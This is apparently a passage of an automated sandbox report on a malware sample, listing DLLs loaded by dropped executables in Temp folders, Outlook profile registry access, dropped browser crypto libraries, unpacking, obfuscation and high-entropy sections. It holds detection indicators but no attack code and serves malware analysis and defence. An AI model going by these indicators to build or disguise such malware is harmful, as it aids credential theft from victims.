Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2533376 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x227400
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.7b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Unpacked PE file: 7.2.CFBAKEHIEB.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Unpacked PE file: 14.2.0244247334.exe.720000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.7.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
Source: random[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x271053
Source: CFBAKEHIEB.exe.0.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
Source: 0244247334.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x271053
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x271053
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: aosuufqe
Source: amadka[1].exe.0.dr Static PE information: section name: lxnltetw
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .idata
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: aosuufqe
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: lxnltetw
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: aosuufqe
Source: explorti.exe.7.dr Static PE information: section name: lxnltetw
Source: explorti.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B536 push ecx; ret 0_2_6C58B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0065D82C push ecx; ret 13_2_0065D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED525D0 push 7ED50002h; ret 14_2_7ED525DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50AD0 push 7ED50002h; ret 14_2_7ED50ADF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50DD0 push 7ED50002h; ret 14_2_7ED50DDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED510D0 push 7ED50002h; ret 14_2_7ED510DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED513D0 push 7ED50002h; ret 14_2_7ED513DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED516D0 push 7ED50002h; ret 14_2_7ED516DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED519D0 push 7ED50002h; ret 14_2_7ED519DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51CD0 push 7ED50002h; ret 14_2_7ED51CDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51FD0 push 7ED50002h; ret 14_2_7ED51FDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED522D0 push 7ED50002h; ret 14_2_7ED522DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED526C0 push 7ED50002h; ret 14_2_7ED526CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50BC0 push 7ED50002h; ret 14_2_7ED50BCF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50EC0 push 7ED50002h; ret 14_2_7ED50ECF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED511C0 push 7ED50002h; ret 14_2_7ED511CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED514C0 push 7ED50002h; ret 14_2_7ED514CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED517C0 push 7ED50002h; ret 14_2_7ED517CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51AC0 push 7ED50002h; ret 14_2_7ED51ACF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51DC0 push 7ED50002h; ret 14_2_7ED51DCF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED520C0 push 7ED50002h; ret 14_2_7ED520CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED523C0 push 7ED50002h; ret 14_2_7ED523CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED526F0 push 7ED50002h; ret 14_2_7ED526FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED523F0 push 7ED50002h; ret 14_2_7ED523FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED508F0 push 7ED50002h; ret 14_2_7ED508FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50BF0 push 7ED50002h; ret 14_2_7ED50BFF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50EF0 push 7ED50002h; ret 14_2_7ED50EFF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED511F0 push 7ED50002h; ret 14_2_7ED511FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED514F0 push 7ED50002h; ret 14_2_7ED514FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED517F0 push 7ED50002h; ret 14_2_7ED517FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51AF0 push 7ED50002h; ret 14_2_7ED51AFF
Source: file.exe Static PE information: section name: entropy: 7.995194725278902
Source: file.exe Static PE information: section name: entropy: 7.976101280157095
Source: file.exe Static PE information: section name: entropy: 7.948506104133843
